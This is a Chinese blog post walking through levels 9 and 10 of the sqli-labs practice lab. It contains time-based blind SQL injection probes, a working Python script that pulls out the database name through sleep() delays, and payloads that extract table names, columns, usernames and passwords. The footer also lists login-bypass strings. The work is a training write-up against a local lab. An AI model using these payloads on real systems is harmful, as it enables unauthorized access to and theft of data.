sqli-labs注入漏洞解析--less-9/10

最新推荐文章于 2024-09-10 20:49:26 发布
最新推荐文章于 2024-09-10 20:49:26 发布
阅读量995 收藏 9
点赞数 32
文章标签: sql 数据库 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/duoba_an/article/details/140921881
版权

第九关:

这一关相比第八关,第八关他正确显示you are in,错误不显示you are in,但是第九关你不管是输入正确或者错误都显示 you are in ,这个时候布尔盲注就不适合我们用,所以我们的换一下思路,布尔盲注适合页面对于错误和正确结果有不同反应。如果页面一直不变这个时候我们可以考虑使用时间盲注。

判断注入点

             基于时间的注入(延时注入)

             1. Time-based blind SQL injection
                2.利用前提:页面没有显示位,也没有输入SQL语句执行错误信息,正确的SQL语句和错误的返回页面都一样,但
                是加入sleep(5)条件后,正确的SQL语句页面返回速度明显慢了5秒,错误的SQL语句立即返回。
                3.优点:不需要显示位,不需要报错信息。
                4.缺点:速度慢,耗费大量时间
                5.用法:IF(Condition,A,B)函数
                当Condition为TRUE时,返回A;否则返回B。     
                6.示例:    SELECT * FROM users WHERE id=1 AND IF(ASCII(SUBSTR(USER(),1,1))>65 ,SLEEP(5),1);     
 

?id=1' and sleep(3) --+          有明显延迟
?id=1" and sleep(3) --+          无延迟
?id=1') and sleep(3) --+         无延迟

说明这里的闭合是单引号。   位数暂时不判断了,用脚本的话不需要位数

当请求错误时,延迟时间在3S以后

当请求正确时,延迟时间很短,在3S以内

基于这个我们就可以写脚本来帮助我们注入

import time
import requests
url = "http://127.0.0.1/sqli-labs-php7-master/Less-9/index.php"
#二分法
def inject_database(url):
    name=""
    for i in range(1,20):
        low =32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = "1' and if(ascii(substr(database(),%d,1)) > %d,sleep(1),0)-- " % (i, mid)
            params = {"id": payload}
            start_time = time.time()
            r = requests.get(url,params=params)
            end_time = time.time()
            if end_time - start_time >= 1:
                 low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2

        if mid == 32:
            break
        name += chr(mid)
        print(name)

inject_database(url)

有点慢,但是也是成功拿下数据

下边的操作和之前的一样

爆表

payload = "1' and if(ascii(substr((select group_concat(table_name)from information_schema.tables where table_schema='security'),%d,1)) > %d,sleep(1),0)-- " % (i, mid) 

爆字段

payload = "1' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='security'and table_name='users'),%d,1)) > %d,sleep(1),0)-- " % (i, mid)

username,password

payload = "1' and if(ascii(substr((select group_concat(username) from information_schema.columns where table_schema='security'and table_name='users'),%d,1)) > %d,sleep(1),0)-- " % (i, mid)

            payload = "1' and if(ascii(substr((select group_concat(password) from information_schema.columns where table_schema='security'and table_name='users'),%d,1)) > %d,sleep(1),0)-- " % (i, mid)

拿下

第十关:

和第九关不一样的就是这里是双引号

还是时间盲注,稍微修改,直接使用

 

成功拿到数据库 ,后边的操作都是如法炮制!!!

duoba_an
关注
  • 32
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
sqli-labs注入漏洞解析--less-6
duoba_an的博客
02-29 426
1.第六关了。2.这个和第五关有点像,只是换成了双引号,接下来的都一样,看我操作(换个函数试一下extractvalue,他的报错位置在第二个,那我就利用一下)
sqli-labs-Less-15 时间盲注
feng的博客
09-24 487
sqli-labs的这几题是post注入,之前的几天用万能密码都可以过,但是这题用了各种方式都没回显,因此判断是时间盲注。 关于万能密码,这里引用一下郁离歌大佬的: 1:"or "a"="a 2: ')or('a'='a 3:or 1=1-- 4:'or 1=1-- 5:a'or' 1=1-- 6:"or 1=1-- 7:'or'a'='a 8:"or"="a'='a 9:'or''=' 10:'or'='or' 11:1 or '1'='1'=1 12:1 or '1'='1' or 1=1 13: 'O
SQL注入学习——时间盲注详解 sqli-labs(Less 9)
未完成的歌~的博客
09-01 4580
Less-9 基于时间的双引号盲注
sqli-labs注入漏洞解析--less-7
duoba_an的博客
02-27 1131
我们先看一下第七关页面显示use outfile意思是利用文件上传来做,outfile是将检索到的数据,保存到服务器的文件内:格式:select * into outfile "文件地址"示例:secure_file_priv参数用于限制LOAD DATA, SELECT …LOAD_FILE()传到哪个指定目录。secure_file_priv 为 'NULL' 时,表示限制mysqld不允许导入或导出。
sqli-labs注入漏洞解析--less-46
duoba_an的博客
02-26 2724
在MySQL支持使用ORDER BY语句对查询结果集进行排序处理,使用ORDER BY语句不仅支持对单列数据的排序,还支持对数据表中多列数据的排序。语法格式如下select * from 表名 order by 列名(或者数字) asc;升序(默认升序)select * from 表名 order by 列名(或者数字) desc;降序假设有以下用户表当我们使用命令的时候,是将users这张表按照username这一列进行升序,结果就变成了;
sqli-labs注入漏洞解析--less-5
duoba_an的博客
02-26 414
1.进入第五关我们先看提示2.还是说让我们输入一个id数字,那我们就输入一个先看一下3.根据页面结果得知虽然有显示,但是和前面四关还是不一样是因为页面虽然有东西。但是只有对于请求出错显示,其余的就没有了。这个时候我们用联合查询就没有用,因为联合查询是需要页面有回显位。如果数据 不显示只有对错页面显示我们可以选择报错注入
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 14万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
sqli-labs注入漏洞解析--less-13/14
duoba_an的博客
08-06 223
当输入或者不输入信息时显示登录失败,当账号和密码输入admin,显示登录成功当在用户名输入'时报错了,仔细看报错信息,可以发现他说我密码这里不对,有个单括号,再猜这里可能有注入点当输入')基本可以判断出这里的闭合方式为’),浅试一下嘿,这不就可以了吗使用order by 测回显,当输入1,2时都可以,输入3开始报错尝试报错函数好像是成功了,再试试接下来就简单了,和之前的一样一样的。。。
sqli-labs注入漏洞解析--less-8
duoba_an的博客
08-05 954
Low为32,mid初始值为80,当执行到判断if后没有出现you are in,则执行low =mid+1,low变为81,mid为104,直到出现you are in 时ASCII为115,跳出循环,可以判断出第一个字符为115,对应的就是s。后边的就是表和列的查询,和之前的都一样,只不过这里是要用ASCII码来猜而已,就是有点慢。他只有对和错显示,那我们只能用对或者错误来猜他这个数据库,到了这里基本可以判断出是布尔盲注,那就试一下。再输入其他的都是一样的结果,这里怀疑单引号后边有注入点。
sqli-labs靶场练习笔记
11-09
>' into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--`。 - **第8关:基于延迟的时间盲注** - **特点**:通过观察请求响应时间的变化来判断SQL语句的真假。 - **实现方法**:利用`sleep`...
Sqli-labs靶场第7关详解[Sqli-labs-less-7]
m0_73615178的博客
02-22 2015
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()
sqli-labs-php7环境搭建及通关记录
weixin_44644249的博客
10-28 1708
sqli-labs-php7环境搭建及通关记录 sqli-labs-php7环境搭建及通关记录 学了一个星期的sql注入,将学习过程记录在博客,以后可以查看。 学习视频来自b站的up主:crowsec 视频链接:https://space.bilibili.com/29903122 sqli-labs-php7链接:https://github.com/skyblueee/sqli-labs-php7.git 一. 环境搭建及常用工具 Linux环境搭建(我这里用的是kali linux): 1.启动
SQL注入 sqli-labs部分解析
ziwenya的博客
08-31 637
sql注入基础操作及相关sqli-labs关卡通关流程
pandas读取xlsx文件使用sqlachemy写到数据库
ithongchou的博客
09-10 258
如果你使用的是特定的数据库(如 SQLite、PostgreSQL、MySQL),你还需要安装相应的数据库驱动。通过这些步骤,你可以方便地将 Excel 文件中的数据写入数据库。连接字符串的格式取决于你使用的数据库。(用于读取 Excel 文件)。方法将 DataFrame 数据写入数据库。读取 Excel 文件。
【网络安全】空字节绕过:URL回调+XSS+SQL绕WAF
等风来
09-07 283
经过进一步测试,我发现WAF在解析HTTP请求时,如果发现恶意查询,会导致服务器挂起。如果我连续提交3个请求且服务器挂起,它就会阻止我的IP地址。
被低估的SQL
weixin_61431494的博客
09-03 1483
虽然SQL的核心功能强大,但自定义函数和存储过程常常被低估。它们可以封装复杂的业务逻辑,从而提高数据库操作的效率和一致性。存储过程不仅可以接收参数,还能执行多条SQL语句,并处理事务。ASBEGIN-- 可能的其他初始化操作END;这种封装能够保证操作的原子性,同时提升了数据库应用的性能和安全性。
【PostgreSQL教程】PostgreSQL 高级篇之子查询
最新发布
No8g攻城狮的博客
09-10 203
子查询也可称为内部查询、嵌套查询,指的是在 PostgreSQL 查询中的 WHERE 子句中嵌入查询语句。一个 SELECT 语句的查询结果能够作为另一个语句的输入值。子查询可以与 SELECT、INSERT、UPDATE 和 DELETE 语句一起使用,并可使用运算符如 =、、>=、
SQL注入学习之路:sqli-labs靶场实战解析
"sqli-labs靶场练习笔记涵盖了从2关到24关的SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注,数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入的学习过程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

duoba_an

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值